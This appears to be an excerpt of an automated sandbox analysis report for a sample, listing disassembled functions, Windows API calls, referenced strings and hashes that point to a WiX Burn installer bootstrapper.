                                                                                                                                                                                                                                                                                                  • Instruction ID: eb1c9c2dffa1b71949b8a5002e05f8cc77e91a71971727e28ff238f4f919fdeb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03455a1da3b734120479f796e934ec647e49b1ed6c15fce8ee953fef58af8532
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3214932500A32B7DB21AB65CC0D756B6A8FF14721F150221E844E1E90FB74EC51CBD9
                                                                                                                                                                                                                                                                                                  Function 008741EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0523: EnterCriticalSection.KERNEL32(008CB5FC,00000000,?,?,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A0533
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0523: LeaveCriticalSection.KERNEL32(008CB5FC,?,?,008CB5F4,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A067A
                                                                                                                                                                                                                                                                                                  • OpenEventLogW.ADVAPI32(00000000,Application), ref: 00874212
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0087421E
                                                                                                                                                                                                                                                                                                  • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,008B39D4,00000000), ref: 0087426B
                                                                                                                                                                                                                                                                                                  • CloseEventLog.ADVAPI32(00000000), ref: 00874272
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                                                                                                                                                  • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                                                                                                                                                                                                                                                                  • API String ID: 1844635321-1389066741
                                                                                                                                                                                                                                                                                                  • Opcode ID: 083e1d82f7b5dc4353387f473dc7306f6c98d72f3bc448cb2498731fd41fac68
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5698b71f0ddd19bf2eab33a0f1c7cbdc33ddce83e9e3bba9e00bacc583ee8586
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 083e1d82f7b5dc4353387f473dc7306f6c98d72f3bc448cb2498731fd41fac68
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAF08132A91A727AA73226A65C0ADBB5C6CFA87F317120114BE24F5386DB58C90185F5
                                                                                                                                                                                                                                                                                                  Function 008793FE Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 0087949E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 008794C6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-4263581490
                                                                                                                                                                                                                                                                                                  • Opcode ID: b1c923b66fbed7a1e421d61e74b8a79be91b1dfed79443ed0761a946ec6d316d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ea977d2f8f5a0983313545e4e0fcdd961748b84a17a8d542453773712f171c1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1c923b66fbed7a1e421d61e74b8a79be91b1dfed79443ed0761a946ec6d316d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F718272D00229ABDB11DFD8CC41AEEB7B8FB09710F154225E959FB295E734DD408BA1
                                                                                                                                                                                                                                                                                                  Function 0087E56C Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0087E577
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 0087E5B5
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0087E5C2
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 0087E5D1
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0087E5DF
                                                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0087E5EB
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0087E5FC
                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0087E61E
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0087E626
                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0087E629
                                                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0087E637
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 409979828-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 89fb29dae2f44c4aed34abed0122dbbd4800f42e0196472013e7dd44c2e872d2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0b1bc160460872de27f95bf847c9e242be42d7398964af6c88ef354201f6a1f4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89fb29dae2f44c4aed34abed0122dbbd4800f42e0196472013e7dd44c2e872d2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA217832104208BFEB255F68DC18D7B3FA8FB5A364B058558F61AD62BAD7718810DBA0
                                                                                                                                                                                                                                                                                                  Function 0087A13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 0087A26C
                                                                                                                                                                                                                                                                                                  • Failed to get bundle layout directory property., xrefs: 0087A287
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 0087A1B7
                                                                                                                                                                                                                                                                                                  • WixBundleLastUsedSource, xrefs: 0087A1A1
                                                                                                                                                                                                                                                                                                  • Failed to copy source path., xrefs: 0087A31A
                                                                                                                                                                                                                                                                                                  • Failed to get current process directory., xrefs: 0087A1F3
                                                                                                                                                                                                                                                                                                  • Failed to combine layout source with source., xrefs: 0087A2A4
                                                                                                                                                                                                                                                                                                  • Failed to combine last source with source., xrefs: 0087A210
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                                                                                                                                                                                                  • API String ID: 2767606509-3003062821
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0d31524049a4760a62a40ba4e93c5536be24954662631b98bd28f9c19a2891a3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1dad4d8b3a0b0570fa41782839ec7b59d8d4cc1d211833f82877f2ed5730f2b6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d31524049a4760a62a40ba4e93c5536be24954662631b98bd28f9c19a2891a3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F719C32D05619ABDF1ADFA8C841AEEBBB9FF48310F114129E915F7250E735DD408B62
                                                                                                                                                                                                                                                                                                  Function 00862DBF Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 203sleepfiletimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00862E5F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00862E69
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00862F09
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00862F96
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00862FA3
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00862FB7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0086301F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • pathutil.cpp, xrefs: 00862E8D
                                                                                                                                                                                                                                                                                                  • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00862F66
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                                                                                                                                                  • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3480017824-1101990113
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9420e2abbc68ff35d03b68f47c2b1d7062bf07d63cfebba6d6b77694dd025ff6
                                                                                                                                                                                                                                                                                                  • Instruction ID: d236f73816a3484bcb964850a924caa94f24fbe98e60a63a1a4f6bc32648093c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9420e2abbc68ff35d03b68f47c2b1d7062bf07d63cfebba6d6b77694dd025ff6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10716272D01529ABDB319BA89C49BAAB7B8FB08710F0101E5FA04E7191D7749E848F91
                                                                                                                                                                                                                                                                                                  Function 008A6D50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 165COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,771ADFD0,?,008A72C8,?,?), ref: 008A6DA6
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6E11
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6E89
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6EC8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Free$Compare
                                                                                                                                                                                                                                                                                                  • String ID: label$scheme$term
                                                                                                                                                                                                                                                                                                  • API String ID: 1324494773-4117840027
                                                                                                                                                                                                                                                                                                  • Opcode ID: e8b72a6071e9c4612b0f762f6b3368bc5a900b13d1e91fdf4beb206a335df1d9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9148babbf5aaa9873d15f5f0f569b8130065dc60793471a9389e894ae027d469
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8b72a6071e9c4612b0f762f6b3368bc5a900b13d1e91fdf4beb206a335df1d9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F516D75901219EBEF15CB94C844FAEBBB8FF06711F2842A8F511E66A4E7319E20DB50
                                                                                                                                                                                                                                                                                                  Function 0086CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,008653BD,00000000,00865489,00865445,WixBundleUILevel,840F01E8,?,00000001), ref: 0086CC1C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • payload.cpp, xrefs: 0086CD1D
                                                                                                                                                                                                                                                                                                  • Failed to find embedded payload: %ls, xrefs: 0086CC48
                                                                                                                                                                                                                                                                                                  • Failed to get directory portion of local file path, xrefs: 0086CCF5
                                                                                                                                                                                                                                                                                                  • Failed to ensure directory exists, xrefs: 0086CCEE
                                                                                                                                                                                                                                                                                                  • Failed to get next stream., xrefs: 0086CD03
                                                                                                                                                                                                                                                                                                  • Failed to extract file., xrefs: 0086CCE7
                                                                                                                                                                                                                                                                                                  • Payload was not found in container: %ls, xrefs: 0086CD29
                                                                                                                                                                                                                                                                                                  • Failed to concat file paths., xrefs: 0086CCFC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-1711239286
                                                                                                                                                                                                                                                                                                  • Opcode ID: c26c2df9f4d4bb0b9b5baf5ffcd8ec531c5a41a84cdab382a440f2a5d1c71b60
                                                                                                                                                                                                                                                                                                  • Instruction ID: e3220e66a246e04fa6bf582831101f33eae947b2aba5a2c7972e484e8bf5c63e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c26c2df9f4d4bb0b9b5baf5ffcd8ec531c5a41a84cdab382a440f2a5d1c71b60
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4641F031A40219EBDF259F88CC819BEBBA4FF01710F12817AE999EB352D7349D40DB91
                                                                                                                                                                                                                                                                                                  Function 00864796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 008647BB
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 008647C1
                                                                                                                                                                                                                                                                                                  • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0086484F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Unexpected return value from message pump., xrefs: 008648A5
                                                                                                                                                                                                                                                                                                  • Failed to load UX., xrefs: 00864804
                                                                                                                                                                                                                                                                                                  • Failed to start bootstrapper application., xrefs: 0086481D
                                                                                                                                                                                                                                                                                                  • wininet.dll, xrefs: 008647EE
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 0086489B
                                                                                                                                                                                                                                                                                                  • Failed to create engine for UX., xrefs: 008647DB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message$CurrentPeekThread
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 673430819-2573580774
                                                                                                                                                                                                                                                                                                  • Opcode ID: cccb1b03d3655b93bc7d56a4dbcfa675c0ea851f31ff6dc51e08c9b0194b2c13
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5bb39f6c77591dae6017b2129adc422f4cd15a58a2e0860fec8ce22dac228566
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccb1b03d3655b93bc7d56a4dbcfa675c0ea851f31ff6dc51e08c9b0194b2c13
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7341BF71A00659BFEB119BA8CC85EBEB7ACFF05318F110235F904E7691DB34AD4587A1
                                                                                                                                                                                                                                                                                                  Function 00889C84 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,0088B03E,?,00000001,00000000), ref: 00889D0F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0088B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00889D19
                                                                                                                                                                                                                                                                                                  • CopyFileExW.KERNEL32(00000000,00000000,00889B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00889D67
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0088B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00889D96
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$AttributesCopy
                                                                                                                                                                                                                                                                                                  • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                                                                                                                                                                                                                                                  • API String ID: 1969131206-836986073
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5886ecd06bcd201574a4e59fbcbf4ebc2574e8bf287d9fec1a951e722b2a346d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 89388696fb8b046e0038f50f5606a33cc4f970f4e5cac1bb42ea342fefd2838a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5886ecd06bcd201574a4e59fbcbf4ebc2574e8bf287d9fec1a951e722b2a346d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B310872A01225BBEB20AE558C45EBB77A9FF42B20B198128FD54EB342D725CD00C7E5
                                                                                                                                                                                                                                                                                                  Function 00878EBC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 00879007
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 00878F30
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 00878FB0
                                                                                                                                                                                                                                                                                                  • Failed to allocate access for Users group to path: %ls, xrefs: 00878F72
                                                                                                                                                                                                                                                                                                  • Failed to secure cache path: %ls, xrefs: 00878FEA
                                                                                                                                                                                                                                                                                                  • Failed to allocate access for Administrators group to path: %ls, xrefs: 00878F0F
                                                                                                                                                                                                                                                                                                  • Failed to create ACL to secure cache path: %ls, xrefs: 00878FBB
                                                                                                                                                                                                                                                                                                  • Failed to allocate access for Everyone group to path: %ls, xrefs: 00878F51
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeLocal
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2826327444-4113288589
